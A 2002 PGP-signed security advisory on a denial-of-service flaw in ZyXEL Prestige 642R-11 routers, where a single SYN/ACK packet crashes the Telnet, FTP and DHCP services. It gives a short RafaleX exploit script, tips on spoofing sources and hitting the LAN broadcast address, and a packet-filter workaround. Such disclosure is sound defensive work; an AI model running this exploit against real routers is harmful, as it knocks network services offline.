-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Name: ZyXEL 642R(-11) AJ.6, other routers based on ZyNOS are also suspectible to this DoS Systems Affected: ZyNOS Severity: Medium Risk Category: Denial of Service Vendor URL: www.zyxel.com Vendor contacted: 1.6.2002 Vendor fix: - Summary - - ------- ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets. It is possible to send a packet that will make unavailable the router's services (Telnet&FTP, DHCP service not tested). Network traffic isn't stopped. Possibly more ZyNOS based routers are vulnerable. Please reply if you found any other ZyNOS based router vulnerable. Details - - ------- A ZyXEL 642R-11 router service can be crashed by sending a packet with TCP flags ACK and SYN set at the same time. The service will not be available even through RS-232. Using a SYN-FIN packet will make inaccessible the service port for a few minutes. Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if enabled). TELNET and FTP cannot be deactivated. Bypass packet filter rules: The IP source can be a spoofed one also. This will allow to "bypass" a filter that blocks specifc IP's. As target address you can also use the WAN address in LAN (see BID3346: http://online.securityfocus.com/bid/3346), if the router's packet filter blocks his local address as target. The DoS attack works also using the broadcast address of the LAN. This means that all ZyXEL routers in LAN vulnerable to this attack can be crashed by sending one single packet. Exploit - - ------- # This is a RafaleX script (Download: www.packx.net) # Rafale X script # --------------- # Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23 # %name=ZyXEL telnet service DoS %category=Denial of service %date=23-05-2002 %rafalemin=0.2 %description=Crash ZyXEL router telnet service with ACK and SYN flag // Variables $done=Target attacked... // Do the stuff... !Display=Please wait... !Sleep 500 PORTDST=23 IPHEADERSIZE=20 ACK=1 SYN=1 !Display=Sending the packet... !SEND 1 TCP !Sleep 200 !Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6)) !Sleep 1000 !Display=$done Fix - - --- not yet available (17.6.2002). Vendor was contacted 1.6.2002. Workaround - - ---------- - - - on WAN device block these packets: - all packets coming from WAN to port 21,23 and 67 (source: 0.0.0.0 -> target: 0.0.0.0, apply on input filter of WAN device) - - - on LAN device block these packets, ports 21,23 and 67 - WAN IP of the router as target IP (Why? http://online.securityfocus.com/bid/3346..) - LAN address of the router as target IP - Broadcast address as target IP.. ;) Regards, Ueli Kistler eclipse@packx.net / iuk@gmx.ch www.packx.net / www.eclipse.fr.fm (IDScenter 1.09 beta 2 is soon out) Greets to PacKX Team (RafaleX packet builder for Win2K/XP) -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPQ3dBmnfm6NyZfRJEQKxCACfZhLa34IfHY7NL5bSl9NK11nUI+EAoNLF ZS3YZqNynsew/jYuvcnLhUVT =hDk8 -----END PGP SIGNATURE----- Key-ID: 0x7265F449
